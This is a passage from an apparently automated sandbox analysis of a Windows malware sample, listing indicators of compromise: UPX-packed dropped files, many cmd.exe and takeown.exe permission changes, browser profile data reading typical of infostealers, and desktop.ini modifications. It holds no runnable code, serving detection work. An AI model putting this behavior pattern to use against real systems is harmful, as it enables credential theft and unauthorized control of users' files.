behavioral1/files/0x00030000000131d3-952.dat upx behavioral1/files/0x00030000000131d3-954.dat upx behavioral1/files/0x00030000000131d3-955.dat upx behavioral1/files/0x00030000000131d3-957.dat upx behavioral1/files/0x00030000000131d3-962.dat upx behavioral1/files/0x00030000000131d3-964.dat upx behavioral1/files/0x00030000000131d3-965.dat upx behavioral1/files/0x00030000000131d3-967.dat upx behavioral1/files/0x00030000000131d3-972.dat upx behavioral1/files/0x00030000000131d3-974.dat upx behavioral1/files/0x00030000000131d3-975.dat upx behavioral1/files/0x00030000000131d3-977.dat upx behavioral1/files/0x00030000000131d3-982.dat upx behavioral1/files/0x00030000000131d3-984.dat upx behavioral1/files/0x00030000000131d3-985.dat upx behavioral1/files/0x00030000000131d3-987.dat upx behavioral1/files/0x00030000000131d3-992.dat upx behavioral1/files/0x00030000000131d3-994.dat upx behavioral1/files/0x00030000000131d3-995.dat upx behavioral1/files/0x00030000000131d3-997.dat upx behavioral1/files/0x00030000000131d3-1002.dat upx behavioral1/files/0x00030000000131d3-1004.dat upx behavioral1/files/0x00030000000131d3-1005.dat upx behavioral1/files/0x00030000000131d3-1007.dat upx behavioral1/files/0x00030000000131d3-1012.dat upx behavioral1/files/0x00030000000131d3-1014.dat upx behavioral1/files/0x00030000000131d3-1015.dat upx behavioral1/files/0x00030000000131d3-1017.dat upx behavioral1/files/0x00030000000131d3-1022.dat upx behavioral1/files/0x00030000000131d3-1024.dat upx behavioral1/files/0x00030000000131d3-1025.dat upx behavioral1/files/0x00030000000131d3-1027.dat upx behavioral1/files/0x00030000000131d3-1032.dat upx behavioral1/files/0x00030000000131d3-1034.dat upx behavioral1/files/0x00030000000131d3-1035.dat upx behavioral1/files/0x00030000000131d3-1037.dat upx behavioral1/files/0x00030000000131d3-1042.dat upx behavioral1/files/0x00030000000131d3-1044.dat upx behavioral1/files/0x00030000000131d3-1045.dat upx behavioral1/files/0x00030000000131d3-1047.dat upx behavioral1/files/0x00030000000131d3-1052.dat upx behavioral1/files/0x00030000000131d3-1054.dat upx behavioral1/files/0x00030000000131d3-1055.dat upx behavioral1/files/0x00030000000131d3-1057.dat upx behavioral1/files/0x00030000000131d3-1062.dat upx behavioral1/files/0x00030000000131d3-1064.dat upx behavioral1/files/0x00030000000131d3-1065.dat upx behavioral1/files/0x00030000000131d3-1067.dat upx behavioral1/files/0x00030000000131d3-1072.dat upx behavioral1/files/0x00030000000131d3-1074.dat upx behavioral1/files/0x00030000000131d3-1075.dat upx behavioral1/files/0x00030000000131d3-1077.dat upx behavioral1/files/0x00030000000131d3-1082.dat upx behavioral1/files/0x00030000000131d3-1084.dat upx behavioral1/files/0x00030000000131d3-1085.dat upx behavioral1/files/0x00030000000131d3-1087.dat upx behavioral1/files/0x00030000000131d3-1092.dat upx behavioral1/files/0x00030000000131d3-1094.dat upx behavioral1/files/0x00030000000131d3-1095.dat upx behavioral1/files/0x00030000000131d3-1097.dat upx behavioral1/files/0x00030000000131d3-1102.dat upx behavioral1/files/0x00030000000131d3-1104.dat upx behavioral1/files/0x00030000000131d3-1105.dat upx behavioral1/files/0x00030000000131d3-1107.dat upx behavioral1/files/0x00030000000131d3-1112.dat upx behavioral1/files/0x00030000000131d3-1114.dat upx behavioral1/files/0x00030000000131d3-1115.dat upx behavioral1/files/0x00030000000131d3-1117.dat upx behavioral1/files/0x00030000000131d3-1122.dat upx behavioral1/files/0x00030000000131d3-1124.dat upx behavioral1/files/0x00030000000131d3-1125.dat upx behavioral1/files/0x00030000000131d3-1127.dat upx behavioral1/files/0x00030000000131d3-1132.dat upx behavioral1/files/0x00030000000131d3-1134.dat upx behavioral1/files/0x00030000000131d3-1135.dat upx behavioral1/files/0x00030000000131d3-1137.dat upx behavioral1/files/0x00030000000131d3-1142.dat upx behavioral1/files/0x00030000000131d3-1144.dat upx behavioral1/files/0x00030000000131d3-1145.dat upx behavioral1/files/0x00030000000131d3-1147.dat upx behavioral1/files/0x00030000000131d3-1152.dat upx behavioral1/files/0x00030000000131d3-1154.dat upx behavioral1/files/0x00030000000131d3-1155.dat upx behavioral1/files/0x00030000000131d3-1157.dat upx behavioral1/files/0x00030000000131d3-1162.dat upx behavioral1/files/0x00030000000131d3-1164.dat upx behavioral1/files/0x00030000000131d3-1165.dat upx behavioral1/files/0x00030000000131d3-1167.dat upx behavioral1/files/0x00030000000131d3-1172.dat upx behavioral1/files/0x00030000000131d3-1174.dat upx behavioral1/files/0x00030000000131d3-1175.dat upx behavioral1/files/0x00030000000131d3-1177.dat upx behavioral1/files/0x00030000000131d3-1182.dat upx behavioral1/files/0x00030000000131d3-1184.dat upx behavioral1/files/0x00030000000131d3-1185.dat upx behavioral1/files/0x00030000000131d3-1187.dat upx behavioral1/files/0x00030000000131d3-1192.dat upx behavioral1/files/0x00030000000131d3-1194.dat upx behavioral1/files/0x00030000000131d3-1195.dat upx behavioral1/files/0x00030000000131d3-1197.dat upx behavioral1/files/0x00030000000131d3-1202.dat upx behavioral1/files/0x00030000000131d3-1204.dat upx behavioral1/files/0x00030000000131d3-1205.dat upx behavioral1/files/0x00030000000131d3-1207.dat upx behavioral1/files/0x00030000000131d3-1212.dat upx behavioral1/files/0x00030000000131d3-1214.dat upx behavioral1/files/0x00030000000131d3-1215.dat upx behavioral1/files/0x00030000000131d3-1217.dat upx behavioral1/files/0x00030000000131d3-1222.dat upx behavioral1/files/0x00030000000131d3-1224.dat upx behavioral1/files/0x00030000000131d3-1225.dat upx behavioral1/files/0x00030000000131d3-1227.dat upx behavioral1/files/0x00030000000131d3-1232.dat upx behavioral1/files/0x00030000000131d3-1234.dat upx behavioral1/files/0x00030000000131d3-1235.dat upx behavioral1/files/0x00030000000131d3-1237.dat upx behavioral1/files/0x00030000000131d3-1242.dat upx behavioral1/files/0x00030000000131d3-1244.dat upx behavioral1/files/0x00030000000131d3-1245.dat upx behavioral1/files/0x00030000000131d3-1247.dat upx behavioral1/files/0x00030000000131d3-1252.dat upx behavioral1/files/0x00030000000131d3-1254.dat upx behavioral1/files/0x00030000000131d3-1255.dat upx behavioral1/files/0x00030000000131d3-1257.dat upx behavioral1/files/0x00030000000131d3-1262.dat upx behavioral1/files/0x00030000000131d3-1264.dat upx behavioral1/files/0x00030000000131d3-1265.dat upx behavioral1/files/0x00030000000131d3-1267.dat upx behavioral1/files/0x00030000000131d3-1272.dat upx behavioral1/files/0x00030000000131d3-1274.dat upx behavioral1/files/0x00030000000131d3-1275.dat upx behavioral1/files/0x00030000000131d3-1277.dat upx behavioral1/files/0x00030000000131d3-1282.dat upx behavioral1/files/0x00030000000131d3-1284.dat upx behavioral1/files/0x00030000000131d3-1285.dat upx behavioral1/files/0x00030000000131d3-1287.dat upx behavioral1/files/0x00030000000131d3-1292.dat upx behavioral1/files/0x00030000000131d3-1294.dat upx behavioral1/files/0x00030000000131d3-1295.dat upx behavioral1/files/0x00030000000131d3-1297.dat upx behavioral1/files/0x00030000000131d3-1302.dat upx behavioral1/files/0x00030000000131d3-1304.dat upx behavioral1/files/0x00030000000131d3-1305.dat upx behavioral1/files/0x00030000000131d3-1307.dat upx behavioral1/files/0x00030000000131d3-1312.dat upx behavioral1/files/0x00030000000131d3-1314.dat upx behavioral1/files/0x00030000000131d3-1315.dat upx behavioral1/files/0x00030000000131d3-1317.dat upx behavioral1/files/0x00030000000131d3-1322.dat upx behavioral1/files/0x00030000000131d3-1324.dat upx behavioral1/files/0x00030000000131d3-1325.dat upx behavioral1/files/0x00030000000131d3-1327.dat upx behavioral1/files/0x00030000000131d3-1332.dat upx behavioral1/files/0x00030000000131d3-1334.dat upx behavioral1/files/0x00030000000131d3-1335.dat upx behavioral1/files/0x00030000000131d3-1337.dat upx behavioral1/files/0x00030000000131d3-1342.dat upx behavioral1/files/0x00030000000131d3-1344.dat upx behavioral1/files/0x00030000000131d3-1345.dat upx behavioral1/files/0x00030000000131d3-1347.dat upx behavioral1/files/0x00030000000131d3-1352.dat upx behavioral1/files/0x00030000000131d3-1354.dat upx behavioral1/files/0x00030000000131d3-1355.dat upx behavioral1/files/0x00030000000131d3-1357.dat upx behavioral1/files/0x00030000000131d3-1362.dat upx behavioral1/files/0x00030000000131d3-1364.dat upx behavioral1/files/0x00030000000131d3-1365.dat upx behavioral1/files/0x00030000000131d3-1367.dat upx behavioral1/files/0x00030000000131d3-1372.dat upx behavioral1/files/0x00030000000131d3-1374.dat upx behavioral1/files/0x00030000000131d3-1375.dat upx behavioral1/files/0x00030000000131d3-1377.dat upx behavioral1/files/0x00030000000131d3-1382.dat upx behavioral1/files/0x00030000000131d3-1384.dat upx behavioral1/files/0x00030000000131d3-1385.dat upx behavioral1/files/0x00030000000131d3-1387.dat upx behavioral1/files/0x00030000000131d3-1392.dat upx behavioral1/files/0x00030000000131d3-1394.dat upx behavioral1/files/0x00030000000131d3-1395.dat upx behavioral1/files/0x00030000000131d3-1397.dat upx behavioral1/files/0x00030000000131d3-1402.dat upx behavioral1/files/0x00030000000131d3-1404.dat upx behavioral1/files/0x00030000000131d3-1405.dat upx behavioral1/files/0x00030000000131d3-1407.dat upx behavioral1/files/0x00030000000131d3-1412.dat upx behavioral1/files/0x00030000000131d3-1414.dat upx behavioral1/files/0x00030000000131d3-1415.dat upx behavioral1/files/0x00030000000131d3-1417.dat upx behavioral1/files/0x00030000000131d3-1422.dat upx behavioral1/files/0x00030000000131d3-1424.dat upx behavioral1/files/0x00030000000131d3-1425.dat upx behavioral1/files/0x00030000000131d3-1427.dat upx behavioral1/files/0x00030000000131d3-1432.dat upx behavioral1/files/0x00030000000131d3-1434.dat upx behavioral1/files/0x00030000000131d3-1435.dat upx behavioral1/files/0x00030000000131d3-1437.dat upx behavioral1/files/0x00030000000131d3-1442.dat upx behavioral1/files/0x00030000000131d3-1444.dat upx behavioral1/files/0x00030000000131d3-1445.dat upx behavioral1/files/0x00030000000131d3-1447.dat upx behavioral1/files/0x00030000000131d3-1452.dat upx behavioral1/files/0x00030000000131d3-1454.dat upx behavioral1/files/0x00030000000131d3-1455.dat upx behavioral1/files/0x00030000000131d3-1457.dat upx behavioral1/files/0x00030000000131d3-1462.dat upx behavioral1/files/0x00030000000131d3-1464.dat upx behavioral1/files/0x00030000000131d3-1465.dat upx behavioral1/files/0x00030000000131d3-1467.dat upx behavioral1/files/0x00030000000131d3-1472.dat upx behavioral1/files/0x00030000000131d3-1474.dat upx behavioral1/files/0x00030000000131d3-1475.dat upx behavioral1/files/0x00030000000131d3-1477.dat upx behavioral1/files/0x00030000000131d3-1482.dat upx behavioral1/files/0x00030000000131d3-1484.dat upx behavioral1/files/0x00030000000131d3-1485.dat upx behavioral1/files/0x00030000000131d3-1487.dat upx behavioral1/files/0x00030000000131d3-1492.dat upx behavioral1/files/0x00030000000131d3-1494.dat upx behavioral1/files/0x00030000000131d3-1495.dat upx behavioral1/files/0x00030000000131d3-1497.dat upx behavioral1/files/0x00030000000131d3-1502.dat upx behavioral1/files/0x00030000000131d3-1504.dat upx behavioral1/files/0x00030000000131d3-1505.dat upx behavioral1/files/0x00030000000131d3-1507.dat upx behavioral1/files/0x00030000000131d3-1512.dat upx behavioral1/files/0x00030000000131d3-1514.dat upx behavioral1/files/0x00030000000131d3-1515.dat upx behavioral1/files/0x00030000000131d3-1517.dat upx behavioral1/files/0x00030000000131d3-1522.dat upx behavioral1/files/0x00030000000131d3-1524.dat upx behavioral1/files/0x00030000000131d3-1525.dat upx behavioral1/files/0x00030000000131d3-1527.dat upx behavioral1/files/0x00030000000131d3-1532.dat upx behavioral1/files/0x00030000000131d3-1534.dat upx behavioral1/files/0x00030000000131d3-1535.dat upx behavioral1/files/0x00030000000131d3-1537.dat upx behavioral1/files/0x00030000000131d3-1542.dat upx behavioral1/files/0x00030000000131d3-1544.dat upx behavioral1/files/0x00030000000131d3-1545.dat upx behavioral1/files/0x00030000000131d3-1547.dat upx behavioral1/files/0x00030000000131d3-1552.dat upx behavioral1/files/0x00030000000131d3-1554.dat upx behavioral1/files/0x00030000000131d3-1555.dat upx behavioral1/files/0x00030000000131d3-1557.dat upx behavioral1/files/0x00030000000131d3-1562.dat upx behavioral1/files/0x00030000000131d3-1564.dat upx behavioral1/files/0x00030000000131d3-1565.dat upx behavioral1/files/0x00030000000131d3-1567.dat upx behavioral1/files/0x00030000000131d3-1572.dat upx behavioral1/files/0x00030000000131d3-1574.dat upx behavioral1/files/0x00030000000131d3-1575.dat upx behavioral1/files/0x00030000000131d3-1577.dat upx behavioral1/files/0x00030000000131d3-1582.dat upx behavioral1/files/0x00030000000131d3-1584.dat upx behavioral1/files/0x00030000000131d3-1585.dat upx behavioral1/files/0x00030000000131d3-1587.dat upx behavioral1/files/0x00030000000131d3-1592.dat upx behavioral1/files/0x00030000000131d3-1594.dat upx behavioral1/files/0x00030000000131d3-1595.dat upx behavioral1/files/0x00030000000131d3-1597.dat upx behavioral1/files/0x00030000000131d3-1602.dat upx behavioral1/files/0x00030000000131d3-1604.dat upx behavioral1/files/0x00030000000131d3-1605.dat upx behavioral1/files/0x00030000000131d3-1607.dat upx behavioral1/files/0x00030000000131d3-1612.dat upx behavioral1/files/0x00030000000131d3-1614.dat upx behavioral1/files/0x00030000000131d3-1615.dat upx behavioral1/files/0x00030000000131d3-1617.dat upx behavioral1/files/0x00030000000131d3-1622.dat upx behavioral1/files/0x00030000000131d3-1624.dat upx behavioral1/files/0x00030000000131d3-1625.dat upx behavioral1/files/0x00030000000131d3-1627.dat upx behavioral1/files/0x00030000000131d3-1632.dat upx behavioral1/files/0x00030000000131d3-1634.dat upx behavioral1/files/0x00030000000131d3-1635.dat upx behavioral1/files/0x00030000000131d3-1637.dat upx behavioral1/files/0x00030000000131d3-1642.dat upx behavioral1/files/0x00030000000131d3-1644.dat upx behavioral1/files/0x00030000000131d3-1645.dat upx behavioral1/files/0x00030000000131d3-1647.dat upx behavioral1/files/0x00030000000131d3-1652.dat upx behavioral1/files/0x00030000000131d3-1654.dat upx behavioral1/files/0x00030000000131d3-1655.dat upx behavioral1/files/0x00030000000131d3-1657.dat upx behavioral1/files/0x00030000000131d3-1662.dat upx behavioral1/files/0x00030000000131d3-1664.dat upx behavioral1/files/0x00030000000131d3-1665.dat upx behavioral1/files/0x00030000000131d3-1667.dat upx behavioral1/files/0x00030000000131d3-1672.dat upx behavioral1/files/0x00030000000131d3-1674.dat upx behavioral1/files/0x00030000000131d3-1675.dat upx behavioral1/files/0x00030000000131d3-1677.dat upx behavioral1/files/0x00030000000131d3-1682.dat upx behavioral1/files/0x00030000000131d3-1684.dat upx behavioral1/files/0x00030000000131d3-1685.dat upx behavioral1/files/0x00030000000131d3-1687.dat upx behavioral1/files/0x00030000000131d3-1692.dat upx behavioral1/files/0x00030000000131d3-1694.dat upx behavioral1/files/0x00030000000131d3-1695.dat upx behavioral1/files/0x00030000000131d3-1697.dat upx behavioral1/files/0x00030000000131d3-1702.dat upx behavioral1/files/0x00030000000131d3-1704.dat upx behavioral1/files/0x00030000000131d3-1705.dat upx behavioral1/files/0x00030000000131d3-1707.dat upx behavioral1/files/0x00030000000131d3-1712.dat upx behavioral1/files/0x00030000000131d3-1714.dat upx behavioral1/files/0x00030000000131d3-1715.dat upx behavioral1/files/0x00030000000131d3-1717.dat upx behavioral1/files/0x00030000000131d3-1722.dat upx behavioral1/files/0x00030000000131d3-1724.dat upx behavioral1/files/0x00030000000131d3-1725.dat upx behavioral1/files/0x00030000000131d3-1727.dat upx behavioral1/files/0x00030000000131d3-1732.dat upx behavioral1/files/0x00030000000131d3-1734.dat upx behavioral1/files/0x00030000000131d3-1735.dat upx behavioral1/files/0x00030000000131d3-1737.dat upx behavioral1/files/0x00030000000131d3-1742.dat upx behavioral1/files/0x00030000000131d3-1744.dat upx behavioral1/files/0x00030000000131d3-1745.dat upx behavioral1/files/0x00030000000131d3-1747.dat upx behavioral1/files/0x00030000000131d3-1752.dat upx behavioral1/files/0x00030000000131d3-1754.dat upx behavioral1/files/0x00030000000131d3-1755.dat upx behavioral1/files/0x00030000000131d3-1757.dat upx behavioral1/files/0x00030000000131d3-1762.dat upx behavioral1/files/0x00030000000131d3-1764.dat upx behavioral1/files/0x00030000000131d3-1765.dat upx behavioral1/files/0x00030000000131d3-1767.dat upx behavioral1/files/0x00030000000131d3-1772.dat upx behavioral1/files/0x00030000000131d3-1774.dat upx behavioral1/files/0x00030000000131d3-1775.dat upx behavioral1/files/0x00030000000131d3-1777.dat upx behavioral1/files/0x00030000000131d3-1782.dat upx behavioral1/files/0x00030000000131d3-1784.dat upx behavioral1/files/0x00030000000131d3-1785.dat upx behavioral1/files/0x00030000000131d3-1787.dat upx behavioral1/files/0x00030000000131d3-1792.dat upx behavioral1/files/0x00030000000131d3-1794.dat upx behavioral1/files/0x00030000000131d3-1795.dat upx behavioral1/files/0x00030000000131d3-1797.dat upx behavioral1/files/0x00030000000131d3-1802.dat upx behavioral1/files/0x00030000000131d3-1804.dat upx behavioral1/files/0x00030000000131d3-1805.dat upx behavioral1/files/0x00030000000131d3-1807.dat upx behavioral1/files/0x00030000000131d3-1812.dat upx behavioral1/files/0x00030000000131d3-1814.dat upx behavioral1/files/0x00030000000131d3-1815.dat upx behavioral1/files/0x00030000000131d3-1817.dat upx -
Loads dropped DLL 360 IoCs
pid Process 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1460 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe 1180 cmd.exe 472 jigPt9cX.exe 1916 cmd.exe 1316 cmd.exe 1568 cmd.exe 1780 cmd.exe 1152 cmd.exe 1596 cmd.exe 1492 cmd.exe 432 cmd.exe 1792 cmd.exe 1568 cmd.exe 336 cmd.exe 1152 cmd.exe 1780 cmd.exe 832 cmd.exe 824 cmd.exe 1568 cmd.exe 1260 cmd.exe 1496 cmd.exe 1568 cmd.exe 1224 cmd.exe 1676 cmd.exe 744 cmd.exe 1224 cmd.exe 1596 cmd.exe 560 cmd.exe 1916 cmd.exe 1536 cmd.exe 1068 cmd.exe 1000 cmd.exe 832 cmd.exe 1792 cmd.exe 1260 cmd.exe 1000 cmd.exe 744 cmd.exe 320 cmd.exe 336 cmd.exe 216 cmd.exe 828 cmd.exe 1496 cmd.exe 1144 cmd.exe 1072 cmd.exe 880 cmd.exe 1444 cmd.exe 216 cmd.exe 1820 cmd.exe 1496 cmd.exe 1444 cmd.exe 940 cmd.exe 880 cmd.exe 1992 cmd.exe 1752 cmd.exe 1536 cmd.exe 1824 cmd.exe 396 cmd.exe 992 cmd.exe 1028 cmd.exe 1756 cmd.exe 1928 cmd.exe 572 cmd.exe 560 cmd.exe 952 cmd.exe 828 cmd.exe 1444 cmd.exe 800 cmd.exe 1572 cmd.exe 1380 cmd.exe 1084 cmd.exe 1536 cmd.exe 960 cmd.exe 1224 cmd.exe 1028 cmd.exe 992 cmd.exe 1536 cmd.exe 904 cmd.exe 1864 cmd.exe 1836 cmd.exe 992 cmd.exe 208 cmd.exe 1424 cmd.exe 1068 cmd.exe 832 cmd.exe 1224 cmd.exe 1028 cmd.exe 432 cmd.exe 1756 cmd.exe 896 cmd.exe 1572 cmd.exe 780 cmd.exe 1568 cmd.exe 1444 cmd.exe 556 cmd.exe 1864 cmd.exe 1316 cmd.exe 396 cmd.exe 1676 cmd.exe 968 cmd.exe 1068 cmd.exe 1908 cmd.exe 940 cmd.exe 1912 cmd.exe 1480 cmd.exe 1144 cmd.exe 1752 cmd.exe 1476 cmd.exe 960 cmd.exe 1256 cmd.exe 1028 cmd.exe 904 cmd.exe 1756 cmd.exe 880 cmd.exe 1988 cmd.exe 204 cmd.exe 208 cmd.exe 1480 cmd.exe 956 cmd.exe 1752 cmd.exe 1824 cmd.exe 1264 cmd.exe 216 cmd.exe 1992 cmd.exe 1380 cmd.exe 940 cmd.exe 572 cmd.exe 952 cmd.exe 1476 cmd.exe 1072 cmd.exe 880 cmd.exe 1908 cmd.exe 1264 cmd.exe 1824 cmd.exe 1572 cmd.exe 216 cmd.exe 204 cmd.exe 1380 cmd.exe 1480 cmd.exe 208 cmd.exe 1916 cmd.exe 1496 cmd.exe 572 cmd.exe 832 cmd.exe 336 cmd.exe 1284 cmd.exe 824 cmd.exe 1260 cmd.exe 1224 cmd.exe 816 cmd.exe 1284 cmd.exe 208 cmd.exe 1692 cmd.exe 1780 cmd.exe 1988 cmd.exe 304 cmd.exe 1928 cmd.exe 896 cmd.exe 956 cmd.exe 1876 cmd.exe 304 cmd.exe 1800 cmd.exe 1028 cmd.exe 1444 cmd.exe 1260 cmd.exe 1316 cmd.exe 1424 cmd.exe 336 cmd.exe 208 cmd.exe 1912 cmd.exe 1480 cmd.exe 1824 cmd.exe 1572 cmd.exe 216 cmd.exe 956 cmd.exe 1752 cmd.exe 1084 cmd.exe 1780 cmd.exe 1028 cmd.exe 1928 cmd.exe 1536 cmd.exe 1496 cmd.exe 800 cmd.exe 1992 cmd.exe 208 cmd.exe 396 cmd.exe 1836 cmd.exe 1908 cmd.exe 1624 cmd.exe 1800 cmd.exe 992 cmd.exe 1444 cmd.exe 1824 cmd.exe 968 cmd.exe 1072 cmd.exe 1864 cmd.exe 336 cmd.exe 320 cmd.exe 1228 cmd.exe 1876 cmd.exe 572 cmd.exe 592 cmd.exe 1836 cmd.exe 1536 cmd.exe 1624 cmd.exe 1256 cmd.exe 992 cmd.exe 1380 cmd.exe 556 cmd.exe 304 cmd.exe 1072 cmd.exe 940 cmd.exe 1752 cmd.exe 1988 cmd.exe 968 cmd.exe 1824 cmd.exe 1864 cmd.exe 1424 cmd.exe 880 cmd.exe 832 cmd.exe 952 cmd.exe 1852 cmd.exe 1780 cmd.exe 1992 cmd.exe 336 cmd.exe 1836 cmd.exe 1796 cmd.exe 1624 cmd.exe 1752 cmd.exe 592 cmd.exe 304 cmd.exe 1444 cmd.exe 992 cmd.exe 828 cmd.exe 1536 cmd.exe 1380 cmd.exe 780 cmd.exe 1908 cmd.exe 1264 cmd.exe 1756 cmd.exe 1572 cmd.exe 880 cmd.exe 1796 cmd.exe 952 cmd.exe 940 cmd.exe 1780 cmd.exe 304 cmd.exe 336 cmd.exe 1568 cmd.exe 1864 cmd.exe 824 cmd.exe 1752 cmd.exe 1836 cmd.exe 1800 cmd.exe 1852 cmd.exe 956 cmd.exe 1624 cmd.exe 968 cmd.exe 592 cmd.exe 1916 cmd.exe 956 cmd.exe 1908 cmd.exe 204 cmd.exe 1752 cmd.exe 1284 cmd.exe 1696 cmd.exe 1224 cmd.exe 1256 cmd.exe 1028 cmd.exe 1692 cmd.exe 396 cmd.exe 320 cmd.exe 1228 cmd.exe 1572 cmd.exe 972 cmd.exe 1424 cmd.exe 1916 cmd.exe 1756 cmd.exe 204 cmd.exe 960 cmd.exe 1284 cmd.exe 216 cmd.exe 1224 cmd.exe 1380 cmd.exe 1028 cmd.exe 1836 cmd.exe 1988 cmd.exe 1536 cmd.exe 1820 cmd.exe 1912 cmd.exe 968 cmd.exe 1796 cmd.exe 336 cmd.exe 1824 cmd.exe 1780 cmd.exe 1256 cmd.exe 960 cmd.exe 1852 cmd.exe 1992 cmd.exe 1928 cmd.exe 304 cmd.exe 1152 cmd.exe 1988 cmd.exe 572 cmd.exe 800 cmd.exe 1756 cmd.exe 396 cmd.exe 1260 cmd.exe 1228 cmd.exe 1796 cmd.exe 1028 cmd.exe 1820 cmd.exe 1916 cmd.exe 968 cmd.exe 904 cmd.exe 1568 cmd.exe 880 cmd.exe 952 cmd.exe 1812 cmd.exe 1856 cmd.exe 1852 cmd.exe 1144 cmd.exe 1380 cmd.exe 556 cmd.exe 1864 cmd.exe 952 cmd.exe 1992 cmd.exe 992 cmd.exe 788 cmd.exe 1920 cmd.exe 828 cmd.exe 1568 cmd.exe 1796 cmd.exe 1596 cmd.exe 1256 cmd.exe 1480 cmd.exe 1068 cmd.exe 800 cmd.exe 744 cmd.exe 1908 cmd.exe 1800 cmd.exe 572 cmd.exe 1412 cmd.exe 204 cmd.exe 780 cmd.exe 1804 cmd.exe 1824 cmd.exe 1228 cmd.exe 1696 cmd.exe 1224 cmd.exe 1876 cmd.exe 952 cmd.exe 1820 cmd.exe 744 cmd.exe 396 cmd.exe 2036 cmd.exe 1536 cmd.exe 1412 cmd.exe 1636 cmd.exe 800 cmd.exe -
Modifies file permissions 1 TTPs 179 IoCs
pid Process 968 takeown.exe 816 takeown.exe 1476 takeown.exe 816 takeown.exe 952 takeown.exe 1916 takeown.exe 1908 takeown.exe 1980 takeown.exe 216 takeown.exe 1316 takeown.exe 1852 takeown.exe 780 takeown.exe 1084 takeown.exe 1824 takeown.exe 572 takeown.exe 1028 takeown.exe 1928 takeown.exe 1444 takeown.exe 1568 takeown.exe 1228 takeown.exe 816 takeown.exe 1756 takeown.exe 800 takeown.exe 816 takeown.exe 1876 takeown.exe 1988 takeown.exe 1696 takeown.exe 1696 takeown.exe 1596 takeown.exe 1696 takeown.exe 1000 takeown.exe 1756 takeown.exe 1476 takeown.exe 1800 takeown.exe 1912 takeown.exe 1836 takeown.exe 572 takeown.exe 1496 takeown.exe 896 takeown.exe 904 takeown.exe 828 takeown.exe 1572 takeown.exe 1624 takeown.exe 1444 takeown.exe 940 takeown.exe 1496 takeown.exe 1912 takeown.exe 1824 takeown.exe 1820 takeown.exe 1876 takeown.exe 1264 takeown.exe 560 takeown.exe 956 takeown.exe 828 takeown.exe 824 takeown.exe 968 takeown.exe 1380 takeown.exe 1876 takeown.exe 1568 takeown.exe 1692 takeown.exe 1768 takeown.exe 800 takeown.exe 956 takeown.exe 1264 takeown.exe 204 takeown.exe 1444 takeown.exe 940 takeown.exe 1480 takeown.exe 1084 takeown.exe 1144 takeown.exe 304 takeown.exe 1568 takeown.exe 1480 takeown.exe 960 takeown.exe 800 takeown.exe 1380 takeown.exe 1696 takeown.exe 956 takeown.exe 1028 takeown.exe 1284 takeown.exe 940 takeown.exe 2008 takeown.exe 896 takeown.exe 1444 takeown.exe 896 takeown.exe 592 takeown.exe 904 takeown.exe 1068 takeown.exe 1084 takeown.exe 1988 takeown.exe 572 takeown.exe 880 takeown.exe 1824 takeown.exe 1876 takeown.exe 1800 takeown.exe 1316 takeown.exe 1920 takeown.exe 1696 takeown.exe 1824 takeown.exe 1756 takeown.exe 208 takeown.exe 1908 takeown.exe 1596 takeown.exe 396 takeown.exe 1316 takeown.exe 1152 takeown.exe 1000 takeown.exe 1992 takeown.exe 1476 takeown.exe 832 takeown.exe 1224 takeown.exe 1752 takeown.exe 1572 takeown.exe 396 takeown.exe 396 takeown.exe 1568 takeown.exe 1756 takeown.exe 1476 takeown.exe 1316 takeown.exe 1072 takeown.exe 204 takeown.exe 336 takeown.exe 824 takeown.exe 780 takeown.exe 1256 takeown.exe 1696 takeown.exe 1864 takeown.exe 1812 takeown.exe 320 takeown.exe 208 takeown.exe 1824 takeown.exe 1696 takeown.exe 432 takeown.exe 1260 takeown.exe 956 takeown.exe 336 takeown.exe 1496 takeown.exe 1256 takeown.exe 556 takeown.exe 1624 takeown.exe 1596 takeown.exe 1836 takeown.exe 1988 takeown.exe 320 takeown.exe 1144 takeown.exe 1916 takeown.exe 1920 takeown.exe 992 takeown.exe 1988 takeown.exe 1920 takeown.exe 1876 takeown.exe 1928 takeown.exe 832 takeown.exe 816 takeown.exe 956 takeown.exe 1912 takeown.exe 336 takeown.exe 1596 takeown.exe 1020 takeown.exe 780 takeown.exe 832 takeown.exe 880 takeown.exe 1480 takeown.exe 1796 takeown.exe 800 takeown.exe 1812 takeown.exe 1780 takeown.exe 560 takeown.exe 1000 takeown.exe 1000 takeown.exe 968 takeown.exe 1988 takeown.exe 1848 takeown.exe 1316 takeown.exe 968 takeown.exe 1796 takeown.exe 204 takeown.exe 1820 takeown.exe 1476 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 34 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Public\Pictures\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ZMLBLRQ7\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Program Files (x86)\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Admin\Videos\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Public\Downloads\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Admin\Music\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\RBDIK06K\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File opened for modification C:\Users\Admin\Links\desktop.ini 7b5e536827c3bb9f8077aed78726585739bcde796904edd6c4faadc9a8d22eaf.exe File 